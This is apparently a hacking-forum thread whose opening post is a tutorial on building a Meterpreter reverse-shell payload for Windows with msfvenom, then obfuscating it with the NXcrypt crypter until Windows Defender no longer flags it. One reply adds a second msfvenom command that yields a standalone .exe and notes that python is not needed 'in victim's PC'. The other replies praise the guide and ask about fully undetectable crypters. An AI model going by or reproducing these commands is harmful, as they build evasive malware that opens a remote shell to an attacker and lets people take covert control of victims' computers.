How To Create Undetectable Payload for Windows

Greetings everyone, hope you all are fine and shine. Recently hackersploit live streamed on how to actually manually embed payload(s) in apk. I see alot of people were asking for how to create undectectable payload for windows, and a few of them asked that windows defender is not allowing the the exe. So here’s the tutorial for those who needs it.

In this tutorial we will be using a tool called nxcrypt, which is python based and is written by Hadi Mene (h4d3s). The tool actually makes your payload undetectable

  1. First thing first we have to create a payload first.

  2. $sudo msfvenom --payload=python/meterpreter/reverse_tcp LHOST=(ip_here)
    LPORT=(port_here) --out=(path_here)/payload.py

  3. Now that was how to create payload. If you move this payload to windows
    machine (like windows 10), it will delete it and detect it as it’s harmful.

  4. Now you need to make this payload undetectable, to do that first we need a
    a python script named as nxcrypt. This will make the payload undetectable.

    https://github.com/Hadi999/NXcrypt

    STEPS TO MAKE PAYLOAD UNDETECTABLE

  5. Once you have the nxcrypt, you can play around with it.
    $sudo python nxcrypt.py --help (show the help menu)
    There are very less options, so it’s pretty easy to understand.

  6. Now to make payload undetectable simply type the following.
    $sudo python nxcrypt.py /(path_of_payload) -f (path_to_save)

    Now try to move the payload again to your windows machine, and you will find that it
    will be no more detected.

Here is the video if you didn’t get it so = https://www.youtube.com/watch?v=G6k2LL-RE8c&t=52s

Thank You <3

8 Likes

Hello
Just wanted to confirm, this method is to create undetectable payload for Windows.
I recently asked a question in the forum about which Crypter would be best to achieve a FUD stub for Windows.
Is this method focusing on the same?

Thanks for the information either way, cheers :blush:

1 Like

Excellent guide, very much appreciated.

1 Like

Thank you So much <3

Hi @ReDXsploit_Cyber First off I want to thank you for taking the time to share this tutorial with us. I do have a question. Does this require the windows pc to have python installed to execute the .py file? In my experience python is not native to windows and would be a dependency. Undetectable in a folder on windows yes executing without python installed I could not get it to work. What is awesome is nxcrypt a new tool you introduced to me.

1 Like

Hello @MoNsTeR, it doesn’t require to have python installed (it’s actually .exe). well, I do use python in creating the payload but it’s not compulsory. You can use some other methods for creating payload and then pass it by nxcrypt, it will work fine. You can do it with this one as well.

$sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip_here) LPORT=(port_here) R > /(saving_path)/name.exe

Again python is not required in victim’s PC.
Thank You

@ReDXsploit_Cyber Thanks for clarifying this for me to better understand. I was like how the heck is he getting meterpreter on windows with Python script.

1 Like

Great Guide. Very helpful. We should make a combined effort and write up posts for other post-exploitation techniques. I am glad Alexis started this form for us to share and collaborate.

2 Likes